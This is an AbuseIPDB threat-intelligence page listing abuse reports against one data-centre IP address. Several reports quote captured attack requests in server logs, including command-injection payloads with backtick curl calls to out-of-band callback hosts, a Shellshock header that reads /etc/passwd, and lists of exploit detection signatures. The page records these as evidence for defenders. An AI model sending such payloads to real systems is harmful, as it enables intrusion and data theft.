JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 67.217.61.6

67.217.61.6 was found in our database!

This IP was reported 128 times. Confidence of Abuse is 0%: ?

ISP	Host Department NJ, LLC
Usage Type	Data Center/Web Hosting/Transit
ASN	AS19318
Domain Name	interserver.net
Country	🇺🇸 United States of America
City	New York City, New York

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 67.217.61.6

Whois 67.217.61.6

IP Abuse Reports for 67.217.61.6:

This IP address has been reported a total of 128 times from 72 distinct sources. 67.217.61.6 was first reported on July 7th 2025, and the most recent report was 10 months ago.

Old Reports: The most recent abuse report for this IP address is from 10 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇯🇵 Kinsei Engineering Inc.	2025-07-30 22:23:22 (10 months ago)	UFW:High-frequency access to non-released ports used by software with known vulnerabilities.	Port Scan
🇩🇪 Jochen Pretli	2025-07-29 08:00:00 (10 months ago)	connection to honeypot	Brute-Force SSH
🇨🇳 ThreatBook.io	2025-07-28 22:50:28 (10 months ago)	ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/67.217.61.6 2025-07 ... show more ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/67.217.61.6 2025-07-28 12:18:32 / 2025-07-28 11:58:38 /cgi-bin/nightled.cgi,{"body":"page=night_led\u0026start_hour=;id;","content_type":"application/x-www-form-urlencoded","header":{"Accept-Encoding":["gzip"],"Connection":["close"],"Content-Length":["30"],"Content-Type":["application/x-www-form-urlencoded"],"User-Agent":["Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"]},"host":"98.249.33.220:5000","method":"POST","proto":"HTTP/1.1","remote_addr":"67.217.61.6:46902","status_code":200,"url":"/cgi-bin/nightled.cgi","user_agent":"Mozilla/5.0 (Debian; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"} show less	Web App Attack
🇺🇸 Bruce5051	2025-07-28 19:30:24 (10 months ago)	67.217.61.6 - - [28/Jul/2025:12:19:53 -0700] "POST /ws_utc/resources/setting/options HTTP/1.1" 400 2 ... show more 67.217.61.6 - - [28/Jul/2025:12:19:53 -0700] "POST /ws_utc/resources/setting/options HTTP/1.1" 400 248 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 67.217.61.6 - - [28/Jul/2025:12:19:55 -0700] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 400 248 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15" 67.217.61.6 - - [28/Jul/2025:12:30:24 -0700] "GET /global-protect/portal/images/30T68JhAJbJglrZl2lULjJzagzP.txt HTTP/1.1" 400 650 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" ... show less	Hacking Brute-Force Bad Web Bot Web App Attack
🇺🇸 anon333	2025-07-28 16:37:29 (10 months ago)	Hacker syslog review 1753720649	Hacking
🇺🇸 Copious7283	2025-07-28 14:53:21 (10 months ago)	This IP was detected by CrowdSec triggering crowdsecurity/CVE-2022-26134	Hacking
🇺🇸 Bruce5051	2025-07-28 14:42:26 (10 months ago)	67.217.61.6 - - [28/Jul/2025:06:52:39 -0700] "GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1" ... show more 67.217.61.6 - - [28/Jul/2025:06:52:39 -0700] "GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1" 400 150 "-" "-" 67.217.61.6 - - [28/Jul/2025:07:42:24 -0700] "GET /include/makecvs.php?Event=%60curl+http%3a//d236h3m4vtuua5pilatgz1fkk9pi7t31c.oast.pro+-H+'User-Agent%3a+pbOBs4'%60 HTTP/1.1" 400 650 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 67.217.61.6 - - [28/Jul/2025:07:42:26 -0700] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d236h3m4vtuua5pilatgc6zhx4h4tjroh.oast.pro+-H+'User-Agent%3a+pbOBs4'%60 HTTP/1.1" 400 248 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" ... show less	Hacking Brute-Force Bad Web Bot Web App Attack
🇺🇸 Grayslaker	2025-07-28 13:49:00 (10 months ago)	EXPLOIT Apache Struts 2 REST Plugin XStream RCE EXPLOIT Apache Struts Possible OGNL Java ProcessBui ... show more EXPLOIT Apache Struts 2 REST Plugin XStream RCE EXPLOIT Apache Struts Possible OGNL Java ProcessBuilder in client body EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 1 EXPLOIT Realtek SDK - Command Injection Inbound HUNTING HTTP URI Path Normalization Bypasses & Escapes M1 WEB_SERVER /bin/sh In URI Possible Shell Command Execution Attempt WEB_SERVER PHP tags in HTTP POST WEB_SERVER Possible IIS Integer Overflow DoS WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY WEB_SERVER WebShell Generic - ASP File Uploaded WEB_SPECIFIC_APPS Apache OFBiz Authentication Bypass Vulnerability (CVE-2023-49070) WEB_SPECIFIC_APPS Aviatrix Controller Unauthenticated OS Command Injection WEB_SPECIFIC_APPS CraftCMS Remote Code Execution via ConditionsController Object Creation WEB_SPECIFIC_APPS D-Link NAS OS Command Injection in cgi_user_add Function WEB_SPECIFIC_APPS Geoserver JT-Jiffle Extension Code Injection WEB_SPECIFIC_APPS Ivanti EPM S show less	Hacking Web App Attack
🇺🇸 Bruce5051	2025-07-28 13:37:07 (10 months ago)	67.217.61.6 - - [28/Jul/2025:06:16:09 -0700] "GET /pfblockerng/www/index.php HTTP/1.1" 400 248 "-" " ... show more 67.217.61.6 - - [28/Jul/2025:06:16:09 -0700] "GET /pfblockerng/www/index.php HTTP/1.1" 400 248 "-" "-" 67.217.61.6 - - [28/Jul/2025:06:16:10 -0700] "GET /pfblockerng/www/index.php HTTP/1.1" 400 150 "-" "-" 67.217.61.6 - - [28/Jul/2025:06:37:06 -0700] "GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1" 400 248 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" ... show less	Hacking Brute-Force Bad Web Bot Web App Attack
🇺🇸 Allan Hitchmoth	2025-07-28 13:20:00 (10 months ago)	More than 80 unauthorized login attempts directed against our security system, in a 12 hour period.	Brute-Force
🇺🇸 Copious7283	2025-07-28 11:44:52 (10 months ago)	This IP was detected by CrowdSec triggering crowdsecurity/apache_log4j2_cve-2021-44228	Hacking
🇺🇸 st_ps	2025-07-28 11:01:55 (10 months ago)	67.217.61.6 - - [28/Jul/2025:04:01:54 -0700] "GET / HTTP/1.1" 301 162 "() { ignored; }; echo Content ... show more 67.217.61.6 - - [28/Jul/2025:04:01:54 -0700] "GET / HTTP/1.1" 301 162 "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0" ... show less	Brute-Force Bad Web Bot Web App Attack
🇺🇸 anon333	2025-07-28 10:36:39 (10 months ago)	Hacker syslog review 1753698998	Hacking
🇺🇸 Copious7283	2025-07-28 10:23:42 (10 months ago)	This IP was detected by CrowdSec triggering crowdsecurity/http-path-traversal-probing	Hacking Web App Attack
🇺🇸 Copious7283	2025-07-28 09:52:03 (10 months ago)	This IP was detected by CrowdSec triggering crowdsecurity/CVE-2022-37042	Hacking

Showing 1 to 15 of 128 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇹🇷 176.96.131.200

🇸🇬 165.245.176.51

🇰🇷 115.178.75.243

🇷🇺 83.171.89.209

🇸🇬 43.98.248.70

🇵🇱 2a00:1450:4025:804::121

🇺🇸 2604:a940:301:225:0:16::

🇧🇷 205.210.31.249

🇳🇱 204.76.203.81

🇧🇷 189.51.21.129

🇨🇳 119.98.79.125

🇺🇸 95.134.62.68

🇬🇧 81.19.219.246

🇩🇪 64.89.163.128

🇸🇬 43.160.225.169

🇭🇰 43.155.21.198

🇨🇳 39.96.6.171

🇧🇪 34.140.230.232

🇨🇭 209.99.189.174

🇨🇳 175.11.107.92